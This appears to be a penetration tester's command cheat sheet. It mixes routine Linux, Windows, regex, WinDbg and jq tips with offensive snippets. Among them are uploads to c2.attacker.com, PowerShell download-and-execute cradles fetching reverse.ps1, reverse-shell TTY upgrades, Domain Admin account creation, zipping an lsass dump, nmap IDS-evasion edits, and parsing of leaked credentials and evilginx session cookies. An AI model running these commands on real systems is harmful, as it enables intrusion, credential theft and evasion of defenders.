Code review & Regular Expression commands

• Used for manual code review
• A good IDE could also help in tracing once specific lines are found
• A simple example of editors that could do this is Sublime Text and Notepad++ which can search through folders and use regex
• For more Regex references, see my TEMPLATE.py

Grep Fu section

for i in $(grep -R <PATTERN_YOU_ARE_LOOKING_FOR>|cut -d : -f 1|sort -u); do echo "\n==========$i==========\n" && cat $i && read -s -d ' ' && clear;done
for i in $(grep -R <$PATTERN1>|cut -d : -f 1|sort -u); do echo "\n==========$i==========\n" && cat $i|grep -i <$PATTERN2> && read -s -d ' ' && clear;done
for i in $(grep -R <$PATTERN1>|cut -d : -f 1|sort -u); do echo "\n==========$i==========\n" && gedit $i;done

grep -rnw --color "<Pattern>"
# To show only-matching
grep -rnw -o --color "<Pattern>" 
# To show only files containing tha pattern. Useful when there a lot of text in the grep
grep -rnw -l --color "<Pattern>" 
# To exclude certain file extensions.
grep -rnw --color "<Pattern>" --exclude "*.js"

Regex Section

Targeted/Group Matching

perl -lne 'print $1 if /<R(E)GEX>/' < * 
perl -lne 'print "$1/$2" if /<R(E)GE(X)>/' < * 
perl -lne 'print "$1/$2" if /src=\"(.*?)\/(.*?)\//' blob.txt
for i in $(find .); do perl -lne 'print "$1/$2" if /src=\"(.*?)\/(.*?)\//' 2>/dev/null < $i;done|sort -u

Grouping^1

a(bc)           parentheses create a capturing group with value bc
a(?:bc)*        using ?: we disable the capturing group
a(?<foo>bc)     using ?<foo> we put a name to the group -> Try it!

To Test: https://regex101.com

Email Regex

[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+

URL Regex

https?://(www\.)?\w+\.\w+

IP Address^2

cat * | egrep -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"

Subdirectory finder

for i in $(find .); do perl -lne 'print "$1" if /https\:\/\/domain\.com\/(.*?)[\/\"]/'  2>/dev/null < $i;done|sort -u
for i in $(find .); do perl -lne 'print "$1" if /href\=\"(.*?)[\/\"]/'  2>/dev/null < $i;done|grep -v "http:" |grep -v "https:" | sed "s/\&\#32\;/\ /g" | grep -v "\.html" |sort -u

Modyfy the following file to remove SNORT/Suricata detections

=> osscan2.cc

User-Agent

ET SCAN Nmap Scripting Engine User-Agent Detected (Nmap Scripting Engine

User-Agent will be seen in the packet so lets remove the default

SET => 
USER_AGENT = stdnse.get_script_args('http.useragent') or "Mozilla/3.0 (compatible; )"

TCP Windows

ET SCAN NMAP -sS window 1024

SET =>
tcp->th_win = htons(9999); /* Who cares */

ZMap

Detect ZMAP scan

SET=>
tcp_header->th_win = htons(65535);
iph->ip_id = htons(54321);

Useful commands in Linux

comm

• Substitute if not satisfied with diff^1

  comm <-123> file1 file2 2>/dev/null
  

read

• Used for pausing mid loop and possibly asking for user input
• Usually seen with <Press any key to continue>

  # Command below will pause the bash script till <space> is pressed
  read -s -d ' '
  

sed

Basic Sed Commands

• Replace 'newlines' or \n with sed

  cat targets.txt| sed -z "s/\n/\/\nhttps:\/\//g" > targets_https.txt
  cat naabu_output.txt| sed -z "s/\n/\/\nhttps:\/\//g" > naabu_all_ports_withoutIPs_https.txt
  

• Remove 1st and last character

  cat lines.txt|sed "s/^.//;s/.$//"
  

Recursive sed

• In case you want to change values in a lot of text files
• One of the many ways ^2
• Change the 4 values between < >

  find <DIRECTORY_TO_FIND_FROM> \( -type d -name <DIRECTORY_YOU_WANT_TO_AVOID> -prune \) -o -type f -print0 | xargs -0 sed -i 's/<ORIGINAL_TEXT>/<NEW_TEXT>/g'
  

shred

• Delete files
• This cannot easily although still possible to be recovered

  shred -u <file_to_delete>
  

testdisk

• Recover accidentally deleted file (i.e. using rm)[^3]

  sudo testdisk
  # View step 8 of the source. Select the option "Undelete" might not be there, choose "List"
  

ps (Wide output)

• Everybody knows ps aux
• this however generates a limited output
• to show the whole command, do: (add or lessen 'w' if needed)

  ps auxwww
  

grep

• Asides from the common uses of grep
• to filter out all lines ending in a specific character
• Use case: filtering out exported URLs which has duplicates where one URL ends in '/' and one without

  echo "aaaaaaa.rar\nbbbbbbbbrar" > /tmp/temp.txt
  
  $ cat /tmp/temp.txt | grep 'rar$'
  aaaaaaa.rar
  bbbbbbbbrar
  
  #Add '\b' for "word-boundary"
  $ cat /tmp/temp.txt | grep '\brar$'
  aaaaaaa.rar
  
  #Just add '-v' after 'grep' to "select non-matching lines" / inverse
  

RDP

• Connecting to a Windows host via RDP

   xfreerdp +nego +sec-rdp +sec-tls +sec-nla /v:<hostname/IP>  /d: /u:<username> /p:<password> /size:90%
  

• Compressed RDP for low bandwidth or slow RDP connections

  # MTU config first
  ifconfig mtu 1200 <interface>
  ifconfig mtu 1200 tun0
  
  # rdesktop
  rdesktop -a 16 -z -r sound:remote -x b -g 1900x1000 -u <USERNAME> -p <PASSWORD> 192.168.1.5
  rdesktop -d <domain> -u <username> -p <password or '-' for prompt> -a 16 -P -z -E -T <TAG-WindowName> <RDPHOST_IP>
  rdesktop -d company.local -u administrator -p P@ssw0rd -a 16 -P -z -E -T COMPANY-DC3 10.10.10.100
  

iptables ^4

# View rules
sudo iptables -L --line-numbers

# Add rule
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 22 -j ACCEPT

# Drop from everybody else
sudo iptables -A INPUT -p tcp --dport 22 -j DROP

# Save rules
sudo /sbin/iptables–save

# Delete Rule
sudo iptables -D INPUT <line_num>

# Example:
# Only allow SSH connection from 192.168.1.0/24
sudo iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 22 -j DROP

Mirror a website

wget --mirror --convert-links --adjust-extension --page-requisites --wait=1 -o wget-mirror.log --no-parent https://example.org

Upload files via Curl

• Combine with Simple HTTP(s) Servers

  curl -k --user 'root:toor' --upload-file file.zip https://127.0.0.1:8000/file.zip
  curl -k --user 'root:haxorz' --upload-file file.zip https://c2.attacker.com:443/file.zip
  

Upgrade Reverse shell to fully interactive TTY[^6]

• In reverse shell

  python -c 'import pty; pty.spawn("/bin/bash")'
  <Ctrl-Z>
  

• In Attacker console

  stty raw -echo
  fg
  

• In reverse shell

  reset
  export SHELL=bash
  export TERM=xterm-256color
  stty rows <num> columns <cols>
  

Create a user

# Create a user
useradd user -U -s /bin/bash
# Create a sudo user
useradd user -G sudo -U -s /bin/bash

Transfer files using nc (netcat)[^7]

• Basic

  # Receiving
  nc -l -p 9999 > received_file.txt
  # Sending
  nc 192.168.0.1 9999 < received_file.txt
  

• With compression

  # Receiving
  nc -l -p 9999 | xz -dc | tar xvf -
  # Sending
  tar cvf - . | xz -c | nc 192.168.0.1 9999
  

Base64 encode

• Some use cases:
• Encoding Powershell one-liners

  iconv -f ASCII -t UTF-16LE powershell_payload.txt | base64 | tr -d "\n"
  

• Another way below but prioritize above

  echo -n 'Invoke-WebRequest -Uri "http://www.contoso.com" -OutFile "C:\path\file"' | iconv -f UTF8 -t UTF16LE | base64 -w 0
  # Remove the % character at the end
  

Rsync

• Similar to SCP but better overall especially long term[^8]

  rsync -azP root@192.168.1.1:/home/some_directory ./
  

Compressed RDP for low bandwidth

• Lower your MTU first

      ifconfig mtu 1200 <interface>
      ifconfig mtu 1200 tun0
  

• rdesktop

      rdesktop -a 16 -z -r sound:remote -x b -g 1900x1000 -u <USERNAME> -p <PASSWORD> 192.168.1.5
      rdesktop -a 16 -z -r sound:remote -x b -g 1900x1000 -u master -p masterlab 192.168.1.5
  
      rdesktop -a 16 -P -z -E -T <TAG-WindowName> -d <domain> -u <username> -p <password or '-' for prompt> 192.168.1.5
      rdesktop -a 16 -P -z -E -T COMPANY-DC3 -d company.local -u administrator -p P@ssw0rd 192.168.1.5
  

Encrypting files

zip[^8]

zip -e secure.tar.xz.zip notsecure.tar.xz -P someGoodPassword
unzip secure.tar.xz.zip

tar & OpenSSL[^9][^10]

• Unreliable decryption (Have not yet figured out if it's due to different openssl versions or arch)
• This one requires an active tty, need to manually type passphrase

  tar --xz -cvf - *  | openssl enc -e -aes256 -out secured.tar.gz
  

• Did not work in some instances, try on Debian

  tar --xz -cvf - *  | openssl enc -e -aes256 -out secured.tar.gz -pass file:<( echo -n "someGoodPassword" )
  

• Decryption

  openssl enc -d -aes256 -in secured.tar.gz | tar --xz -xv
  

Generate random passwords

openssl rand 256 | sha256sum | cut -d " " -f1

SERVICE_PASSWORD=$(openssl rand 32 | sha256sum | cut -d' ' -f1)
echo $SERVICE_PASSWORD

Go through filenames with spaces

• Basic[^11]

      find . -type f -name '*.*' -print0 | 
      while IFS= read -r -d '' file; do
          printf '%s\n' "$file"
      done
  

• Sample Use Case:
• Export thunderbird inbox to get attachments and move all of the exported attachments into 1 folder for easy viewing/archiving

• In Thunderbird: ImportExportTools NG -> Export all messages in the folder - > as single text file (with attachments)

• Sample command:

  find ../Thunderbird_Export/ -type f -name '*.*' -print0 | while IFS= read -r -d '' file; do mv "$file" .;done
  

List files and sort via date time

ls -t

Sort contents of a file in reverse

• Sort from the last letter to the first [^13]

rev file.txt | sort | rev

Beep

• Beep! [^14]
• Useful when you want to get notified if a task has finished (i.e. nmap scan, hashcat cracking).
• Productivity, no idle time/processing power

• Make sure the Sound card is enabled on the VM settings

• Basic Usage

     sudo apt install beep
     sudo env -i beep
  

• Practical Usage

     echo 'alias beep="sudo env -i beep"' > ~/.zshrc
     source ~/.zshrc
  
     sudo nmap -sn iL subnets.txt && beep
     sudo hashcat -a 0 hash.list rockyou.txt && beep
  

grep for file extensions

• This is when scouring a list not your own filesystem
• I use this when looking for spidered shares
• If you search for .pub for example, you may end up seeing ....Web.Publishing/notcool.js
• Which is why we search for a file extension beside \n [^15]

sudo apt install -y pcregrep
cat spidered_shares.txt|pcregrep -M "\.pub.\n"
cat spidered_shares.txt|pcregrep -M "\.key.\n"
cat spidered_shares.txt|pcregrep -M "\.ppk.\n"

Mobile App Security Testing

Some commands

Logcat

• Following process
• Can be made more verbose/detailed though

      adb logcat --pid=$(adb shell pidof -s <mobile_app_name_i.e._com.imacompany.imanandroidapp>)
  

Useful tips and tricks in Python

TEMPLATE or Skeleton script with tips and references

• This can be found in TEMPLATE.py which is in the Script_Yard repo

Generate requirements.txt

• JCharisTech^1

  pip3 install pipreqs
  pipreqs /path/to/project
  # OR
  pipreqs $(pwd)
  # Manually check the requirements.txt also by installing pip3 install -r requirements.txt
  

Update all pip packages

python3 -m pip install --upgrade pip
pip3 list --outdated --format=freeze | grep -v '^\-e' | cut -d = -f 1  | xargs -n1 pip3 install -U

Global Variables

# Below "import" <insert_package_names>
timeout = None

def imAFunction():
  if i > timeout:
    print("Greater than timeout")

# Inside function. In this example main()
global timeout 
timeout = args.timeout

URL Encode Python String

import urllib.parse
action = urllib.parse.quote_plus("GET_[TO]-THE")
location = urllib.parse.quote_plus("CHOPP@!")
url = "www.domain.com:2323/whatever?action=%s&location=%s" % (action,location)

Accept custom certificate

• When using proxy (i.e. Burp), rather than using verify=False in the request.get or request.post, convert the Burp certificate cacert.der instead to cacert.pem then use in on python requests. ^2
• Most common use case is the usage of burp certificate for python requests SSL error.

  # Converting cacert.der to cacert.pem
  # openssl x509 -in cacert.der -inform DER -outform PEM -out cacert.pem
  r = session.post(burp0_url, headers=burp0_headers, data=burp0_data,proxies=proxies,verify="cacert.pem")
  

WinDbg

Shortcut Keys

• ++f6++ : Attach a process
• ++ctrl+break++ : Break (Force breakpoint)

Basic commands/shortcuts

• g : Go/Continue from breakpoint
• u : Unassemble (View/Display the assembly translation from memory)
• u : Display from EIP
• u <address/symbol>
• u kernel32!GetCurrentThread
• d<X> : Read process memory content
• db <args> : Display bytes
• dw <args> : Display WORD (2 bytes)
• dd <args> : Display DWORD (4 bytes)
• dq <args> : Display QWORD (8 bytes)
• dc <args> : Display DWORD w/ASCII (8 bytes)
• dW <args> : Display WORD w/ASCII (2 bytes)
• d<X> <address/symbol+0xOFFSET> <L<X>> : Common Arguments
• d<X> KERNELBASE+0x40 L8
• d<X> poi(esp) L4
• Notes:
• poi(X) : Pointer to Data
• L<X> : Display Length depends on the value of X in d<X>
• dt <structure>: Display Type (Display Structure)
• dt ntdll!_TEB
• dt <structure> @$teb : To get address if field is a Ptr(Pointer)
• dt <structure> <@$teb> <field> : For specific field only
• Notes:
• ?? sizeof(<structure>) : To get size of structure
• e<X> <address/register> : Edit memory
• ed esp 50505050
• ea esp "hello"
• s -<X> 0 L?80000000 <bytes/keyword> : Search in memory. "0 L?80000000" means whole memory space
• s -d L?80000000 50505050
• s -a L?80000000 "trojand"
• r : Inspect Registers
• r esp
• r esp=50505050 : Editing Registers
• b<X> <args> : Breakpoint
• bp <symbol/address> : Insert breakpoint
• bp kernel32!ReadFile
• bl : List breakpoints
• bd <#> : Disable breakpoint
• be <#> : Enable breakpoint
• be 0
• bc <#> : Clear breakpoint number
• bc * : Clear all breakpoints
• bu <module> : Breakpoint at an unresolved endpoint(module that is not yet loaded)
• ba <e/w/r> <bytes> <module/address> : Hardware breakpoints
• Use to monitor access and changes in memory
• Does not alter code to put INT 3 instruction, see it as it is
• ba e 1 kernel32!WriteFile
• ba w 2 <address> : monitor if first letter will be modified(edited) in memory. i.e. editing notepad without saving
• Breakpoint-based actions:
• bp <symbol/address> "<args>"
• bp <symbol/address> "<.if (<condition>) {<if_condition_met_args>} .else {<else_condition_met_args>}>"

bp kernel32!WriteFile ".if (poi(esp + 0x0C) == 4) {.printf \"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\nHey it's 4 bytes! Stopping at breakpoint now...\\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\"} .else {.printf \"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\nThe number of bytes written is %p \\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\",poi(esp + 0x0C);.echo;gc;}"

• p : Executes single instruction on a breakpoint. Steps over the function call.
• t : Executes single instruction on a breakpoint. Steps inTo the function call.
• pt : Step to next return (ret) instruction

• ph : Step to next brancHing (je/jne) instruction

• lm : Display Loaded Modules

• lm m <module_keywo*> : Browse Modules
• lm m kernel*
• x <module>!<symbo*> : eXamine symbols
• x kernelbase!String*
• x KERNELBASE!StringCchLength

• .reload /f : force reload modules (if not yet loaded)

• ? <hex> <operand> <hex> : WinDbg Calculation

• ? b - 1 : Equals a
• ? <hex> : From hex to hex but producing decimal value on the left of =.
• ? a : 10 = 0000000a
• ? 0n<decimal> : From decimal to hex.
• ? 0n10 : 10 = 0000000a
• ? 0n10 : From binary to hex but producing decimal value on the left of =.
• ? 0y1111 : 15 = 0000000f
• .formats <hex> : Display format in different types
• .formats 54> : below

     Evaluate expression:
     Hex:     00000054
     Decimal: 84
     Octal:   00000000124
     Binary:  00000000 00000000 00000000 01010100
     Chars:   ...T
     Time:    Wed Dec 31 16:01:24 1969
     Float:   low 1.17709e-043 high 0
     Double:  4.15015e-322

• .cls : clear screen

Useful commands in Windows

Windows - Command Prompt

Find a file

dir "\secretfile" /s

Find strings in files

findstr /s /i "FLAG{" C:\*.*

Find multiple words, strings and patterns

• (Equivalent of grep -e WORD1 -e WORD2 -e WORD3)

  findstr /C:WORD1 /C:WORD2 /C:WORD3 FILENAME.TXT
  

Enable default local "administrator" account

net user administrator /active:yes

Adding local accounts (Must have system privileges)

net user trojand imashortpassword /add
net localgroup administrators trojand /add

Adding a Domain Admin account

net group "Domain Admins"
net user trojandDA P@ssw0rd /add /domain
net group "Domain Admins" trojandDA /add /domain
net group "Domain Admins"

List files using tree

tree /f
tree /f /a > tree.txt

Change user password

net user trojand imareallyreallyreallylongpasswordnow

Windows Built-in Plink for relay

netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST>

Show wireless interfaces

netsh wlan show networks mode=bssid

Check for logged on users

query user
qwinsta

List local drives^1

wmic logicaldisk get description,name | findstr /C:"Local"
fsutil fsinfo drives

bitsadmin[^4]

Copying a File

• Better than copy. Less conspicuous by having the service do it for you.

  bitsadmin /create JOB & bitsadmin /addfile JOB <LOCAL_SRC> <LOCAL_DST> & bitsadmin /resume JOB & bitsadmin /complete JOB
  bitsadmin /create JOB & bitsadmin /addfile JOB %SystemRoot%\System32\cmd.exe C:\Users\Administrator\cmd.exe & bitsadmin /resume JOB & bitsadmin /complete JOB
  

Execute a file

• Good for executing files as this will run under svchost -k netsvcs as a child process and not under you command prompt

  bitsadmin /create JOB & bitsadmin /addfile JOB <LOCAL_SRC> <LOCAL_DST> & bitsadmin /SetNotifyCmdLine JOB <PROGRAM_NAME> <PARAMETERS> & bitsadmin /resume JOB & bitsadmin /reset
  bitsadmin /create JOB & bitsadmin /addfile JOB %TEMP%\test1.txt %TEMP%\test2.txt & bitsadmin /SetNotifyCmdLine JOB C:\Windows\System32\calc.exe NULL & bitsadmin /resume JOB & bitsadmin /reset
  

Windows - Powershell

Nested quotes or wrapping multiple double quotes

• Triple double quotes to make one double quote.
• In the example below, the whole RCE command is taken as a variable. Think of the single quotes also as the command portion in your RCE expoits.

      var g = 'powershell -Exec Bypass -c "IEX(New-Object System.Net.WebClient).DownloadString("""http://10.0.1.5:1337/reverse.ps1""")"'
  

• For executing in powershell directly (i.e. interactive powershell), you must use a Grave Accent symbol before the three(3) double quotes.

      powershell -Exec Bypass -c "IEX(New-Object System.Net.WebClient).DownloadString(`"""http://10.0.1.5:1337/reverse.ps1`""")"
  

• BEWARE: This does not seem to work if you are to encode the whole command (IEX...). Better to encode payload/command from Windows to see if it gives an error

Download & Uploading files

• Ignore bad/untrusted/self-signed certificates

      [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
  

• Download only ^1

      Invoke-WebRequest "http://<KALI_IP>:8000/mimikatz.zip" -Out mimikatz.zip
  
      (New-Object System.Net.WebClient).DownloadFile("https://example.com/archive.zip", "C:\Windows\Temp\archive.zip")  
  
      $client = new-object System.Net.WebClient
      $client.DownloadFile("http://<KALI_IP>:8000/mimikatz.zip","mimikatz.zip")
  

• Download and execute

      IEX(New-Object System.Net.WebClient).DownloadString("https://10.0.1.5:1337/reverse.ps1")
      powershell -Exec Bypass -c "IEX(New-Object System.Net.WebClient).DownloadString(`"""http://10.0.1.5:1337/reverse.ps1`""")"
  

• Uploading files
• Setup a Simple HTTP Server for this command.

      $uri = "https://c2.attacker.com/bh.zip"
      $uploadPath = "C:\Windows\temp\20210101000109_BloodHound.zip"
      Invoke-RestMethod -Uri $uri -Method Put -InFile $uploadPath -UseDefaultCredentials
  

cat, tail, grep in Windows PS

• Reading Files

      Get-Content output.log
  

• Tail

      Get-Content output.log -Tail <number of lines>
      Get-Content output.log -Tail 10
  

• Tail -f

      Get-Content output.log -Tail 10 -Wait
  

• Grep

      Get-Content output.log | Select-String -Pattern "<pattern>"
      Get-Content output.log | Select-String -Pattern "password"
  

• Grep -A 3

      Get-Content output.log | Select-String -Pattern "password" -Context 0,3
  

• Tail -f | Grep -A 3

      Get-Content output.log -Tail 10 -Wait | Select-String -Pattern "password" -Context 0,3
  

Find files and contents

• Find files with using filenames

      Get-ChildItem "C:\" -recurse -filter "*password*"
  

• Find contents in files

      Get-ChildItem "C:\Users" -recurse | Select-String -pattern "passw" | group path | select name
  

Expand Archives

Expand-Archive Procdump.zip -DestinationPath "C:\temp\" -Force -Verbose

Compress and Archive

• Powershell 5.0 and greater
• Powershell 3.0 [^6]

      Add-Type -A 'System.IO.Compression.FileSystem'
      [IO.Compression.ZipFile]::CreateFromDirectory("C:\Windows\Temp\folderContainingLsassDMP", 'C:\Windows\temp\lsass.zip')
  

Base64 Encode Powershell commands

• Some use cases:
• Encoding^2 Powershell one-liners

  $MYCOMAND = "Invoke-WebRequest -Uri 'http://www.contoso.com' -OutFile 'C:\path\file'"
  $ENCODED = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($MYCOMMAND))
  Write-Output $ENCODED
  

List directory and sort by Date Time

• Useful when trying to delete any files written to disk (i.e. procdump64.exe/lsassy.exe) and need to sort out through bunch of files (i.e. C:\Windows\temp)
• Command Prompt

      dir /od
  

• Powershell (sorted by date(LastWriteTime). For sorting via other datetime fields, just press “TAB”)

      Get-ChildItem .\|Sort-Object LastWriteTime
  

Tasklist

• Find PID of a process
• CMD

      tasklist /fi "imagename eq lsass.exe"
  

• Powershell

      Get-Process lsass
  

Taskkill

• Killing tasks after tasklist /V ^5
• Useful when killing command and process which did not working and pressing ++ctrl+c++ exited the whole terminal

  taskkill /PID 1234
  taskkill /F /IM cmd.exe
  

Print all HTTP Response Headers

Including Status code ^1

fmt.Printf("RESPONSE:\n")
fmt.Println(resp.Status)
for k, v := range resp.Header {
  fmt.Print(k)
  fmt.Print(" : ")
  fmt.Println(v)
}

Print Full HTTP Request and Response

Includes Headers and Body in a well formatted way ^2 * Request * "Use httputil.DumpRequest() if you want to pretty-print the request on the server side." * "Use httputil.DumpRequestOut() if you want to dump the request on the client side."

    reqDump, err := httputil.DumpRequestOut(req, true)
    if err != nil {
        log.Fatal(err)
    }

    fmt.Printf("REQUEST:\n%s", string(reqDump))

• Response

      respDump, err := httputil.DumpResponse(resp, true)
      if err != nil {
          log.Fatal(err)
      }
  
      fmt.Printf("RESPONSE:\n%s", string(respDump))
  

^2: Go Samples

JQ tips

Disclaimer

There is no need for this nonsense. Refer to this awesome person: Lzone jq cheatsheet

Installation

sudo apt install jq

Filtering (Grepping) for specific key values, then selecting a specific key afterwards

• Example given: Bloohound collector’s json data. Finding hosts with Unconstrained Delegation.

  cat 20210401_computers.json|jq '.computers[] |select(.Properties.unconstraineddelegation ==true) | .Properties.name'
  

Printing 2 or more values

• Example: For priting the email and password/hashed_password from dehashed at the same time

  cat dehashed.txt|jq '.entries[] | {email,password}'
  cat evilginx_sessions.json|jq -r 'keys[] as $k | "\(.[$k] | .name)=\(.[$k] | .value)"' 
  

How to list USB devices on linux command line

The following Gist describes the use of different commands to list all USB devices. Feel free to comment and contribute.

Table of Contents

1. DF Command
2. PARTED Command
3. FDISK Command
4. LSBLK Command
5. FINDMNT Command
6. LSUSB Command

1. First option - DF Command

What you probably are looking for is the df command. This command (which reports the file system disk space usage) can be used along with grep to only print the lines that match the patterns we require, in our case, media. As no file name is given, it will look for mounted file systems so if your USB is encrypted and not already mounted it won't be displayed.

df -Th | grep media

Where the output is:

device name                                     mounted on
/dev/sda       ext2       58G   52M   55G   1% /media/user/device

2. Second option - PARTED Command

In this case we are going to list the USB devices using a partition manipulation program. This command is named parted and requires superuser (root) privileges.

sudo parted -l

Where the output is:

Model: Vendors model (scsi)
Disk /dev/sda: 62,9GB
Sector size (logical/physical): 512B/512B
Partition Table: loop
Disk Flags: 

Number  Start  End     Size    File system  Flags
 1      0,00B  62,9GB  62,9GB  ext2


Model: Your computer (nvme)
Disk /dev/nvme0n1: 256GB
Sector size (logical/physical): 512B/512B
Partition Table: gpt
Disk Flags: 

Number  Start   End     Size    File system     Name                  Flags
 1      1049kB  538MB   537MB   fat32           EFI System Partition  boot
 2      538MB   2685MB  2147MB  linux-swap(v1)                        swap
 3      2685MB  4833MB  2147MB  zfs
 4      4833MB  256GB   251GB   zfs

3. Third option - FDISK Command

The third option also requires the use of sudo to list the disk partition table with the command fdisk.

sudo fdisk -l | grep /dev/s

Where the output is:

      name
Disk  /dev/sda:     58,61 GiB, 62914560000 bytes, 122880000 sectors

4. Fourth option - LSBLK Command

Here the command lists block devices. The command prints all block devices (except RAM disks) in a tree-like format by default. sudo blkid | grep sd can also be used.

lsblk | grep sd

Where the output is:

sda    8:0    1  58,6G  0 disk /media/user/device

5. Fifth option - FINDMNT Command

findmnt will list all mounted filesystems or search for a filesystem so if your USB is encrypted and not already mounted it won't be shown.

findmnt | grep media

Where the output is:

└─/media/user/device /dev/sda       ext2       rw,nosuid,nodev,relatime

6. Sixth option - LSUSB Command

This option won't tell where the device is mounted or how it is called but list all USB devices and display information about its buses in the system and the devices connected to them. Type only one -v to show less information, two -vv for full information. Once you have identified the bus and dev variables of your USB device, then you could grep them to usb-devices for even more information.

lsusb -tvv

Where the output is:

/:  Bus 02.Port 1: Dev 1, Class=root_hub, Driver=xhci_hcd/6p, 5000M
    ID 1d6b:0003 Linux Foundation 3.0 root hub
    /sys/bus/usb/devices/usb2  /dev/bus/usb/002/001
/:  Bus 01.Port 1: Dev 1, Class=root_hub, Driver=xhci_hcd/12p, 480M
    ID 1d6b:0002 Linux Foundation 2.0 root hub
    /sys/bus/usb/devices/usb1  /dev/bus/usb/001/001
    |__ Port 1: Dev 22, If 0, Class=Mass Storage, Driver=usb-storage, 480M
        ID 0930:6544 Toshiba Corp. TransMemory-Mini / Kingston DataTraveler 2.0 Stick
        /sys/bus/usb/devices/1-1  /dev/bus/usb/001/022
    |__ Port 5: Dev 3, If 3, Class=Video, Driver=uvcvideo, 480M
        ID 05c8:0815 Cheng Uei Precision Industry Co., Ltd (Foxlink) 
        /sys/bus/usb/devices/1-5  /dev/bus/usb/001/003
    |__ Port 5: Dev 3, If 1, Class=Video, Driver=uvcvideo, 480M
        ID 05c8:0815 Cheng Uei Precision Industry Co., Ltd (Foxlink) 
        /sys/bus/usb/devices/1-5  /dev/bus/usb/001/003
    |__ Port 5: Dev 3, If 2, Class=Video, Driver=uvcvideo, 480M
        ID 05c8:0815 Cheng Uei Precision Industry Co., Ltd (Foxlink) 
        /sys/bus/usb/devices/1-5  /dev/bus/usb/001/003
    |__ Port 5: Dev 3, If 0, Class=Video, Driver=uvcvideo, 480M
        ID 05c8:0815 Cheng Uei Precision Industry Co., Ltd (Foxlink) 
        /sys/bus/usb/devices/1-5  /dev/bus/usb/001/003
    |__ Port 7: Dev 5, If 0, Class=Wireless, Driver=btusb, 12M
        ID 8087:0a2b Intel Corp. 
        /sys/bus/usb/devices/1-7  /dev/bus/usb/001/005
    |__ Port 7: Dev 5, If 1, Class=Wireless, Driver=btusb, 12M
        ID 8087:0a2b Intel Corp. 
        /sys/bus/usb/devices/1-7  /dev/bus/usb/001/005

[Reference]

^1: Stack Overflow

[^3]: It's FOSS [^4]: Fedora Project

[^6]: 6c2e6e2e - Spawning interactive reverse shells with TTY [^7]: Tutorials Technology - How to transfer files over the network using Netcat [^8]: StackOverflow - How zip file with encryption from bash script [^9]: Tecmint - How to Encrypt and Decrypt Files and Directories Using Tar and OpenSSL [^10]: StackOverflow - Securely passing password to openssl via stdin [^11]: AskUbuntu - Filenames with spaces breaking for loop, find command [^12]: StackOverflow - Understanding a sed command: sed 's/\s\s*/ /g' [^13]: Stackoverflow - How to sort a list of words by the last character [^14]: Reddit - Beep could not open any device... [^15]: StackOverflow- How to give a pattern for new line in grep? [^16]: Windows Commandline - List local drives from command line

[^18]: Tech Expert [^19]: TrustedSec - BITS for Script Kiddies [^20]: Windows Commandline - taskkill [^21]: Shellhacks - Windows: Zip | Unzip – Command Line

[^23]: Medium - Gitconnected [^24]: Factory Mind [^25]: Regex Tutorial